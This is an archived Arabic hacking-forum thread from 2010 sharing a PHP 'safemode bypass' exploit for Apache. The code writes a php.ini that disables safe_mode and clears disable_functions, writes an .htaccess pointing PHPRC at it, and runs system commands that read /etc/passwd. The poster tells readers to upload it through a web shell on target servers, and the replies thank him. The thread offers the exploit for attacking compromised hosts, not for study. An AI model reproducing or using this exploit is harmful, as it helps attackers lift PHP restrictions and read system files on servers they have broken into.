:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   priv8- SetEnv module safemode bypass exploit (http://www.vbspiders.com/vb/t37345.html)

KaLa$nikoV 09-20-2010 12:03 AM
priv8- SetEnv module safemode bypass exploit
 
كود PHP:
<?
/*
apache SetEnv module safemode bypass exploit

SauDi ViRuS TeaM

WwW.Sa-ViRuS.CoM
*/

echo "[+] Start...n";

$bypfile=fopen('php.ini','w+');

$stuffile=fopen('.htaccess','w+');

if($bypfile and $stuffile!= NULL){

echo "[~] evil files created succes ! n";

}

else{

echo "[-] access denial ! n";

}

$byprullz1="safe_mode = OFF

";

$byprullz2="disable_functions = NONE";

$anti=fwrite($bypfile,$byprullz1);

$as1=fwrite($bypfile,$byprullz2);

fclose($bypfile);

if($anti and $as1!= NULL){

echo "[~] php.ini writed n";

}

else{

echo "[-] 404 php.ini not found !n";

}

$breakrullz="SetEnv PHPRC /home/svt/public_html/php.ini"// replace this
'/home/svt/public_html' by your path

$r3no=fwrite($stuffile,$breakrullz);

fclose($stuffile);

if($r3no!= NULL){

echo "[~] evil .htaccess writedn";

echo "[~] exploited by success!nnn";

echo "ttt[+] discouvred by AnTi SeCuRe - RENO n";

echo "ttt[+] home : www.sa-virus.comn";

echo "ttt[+] Greetz : Mr.SaFa7 , Dr.Saudi , MiND n";

}

else{

echo "[-] evil .htaccess Not found!n";

}

system("pwd;ls -lia;uname -a;cat /etc/passwd");


?>

المصدر
http://securityreason.com/exploit*****/9012



احفظ الثغره بملف php
ارفعه ع الشيل وشغلو

هاد في حال السيرفر اباتشي والسيف مود اون

مش كل السيرفرات اباتشي smilies11


موفقين

KaLa$nikoV 09-20-2010 12:21 AM
الثغره بالمصدر في اكواد انحظرت

ViRuS Qalaa 09-20-2010 01:13 AM
[align=center]مشكور على ثغرة يارك الله فيك وطبعا على مااعتقد ثغرة تحتاج ملفين
htaccess +php.ini
[/align]
[align=center][/align]

KaLa$nikoV 09-20-2010 09:50 AM
htaccess +php.ini

بتم انشاءهم تلقائي من الملف الي حتصنعو

اورنج مان 09-20-2010 03:13 PM
الله يعطيك العافيه الثغره من اكتشاف رينو

على مااضن ؟

عوافي على النقل ياحلى حاقن sQl

KaLa$nikoV 09-22-2010 09:39 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة اورنج مان (المشاركة 220983)
الله يعطيك العافيه الثغره من اكتشاف رينو

على مااضن ؟

عوافي على النقل ياحلى حاقن sQl

u r right

GNGR1 09-27-2010 03:06 AM
يعطيك العافيه


الساعة الآن 10:06 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0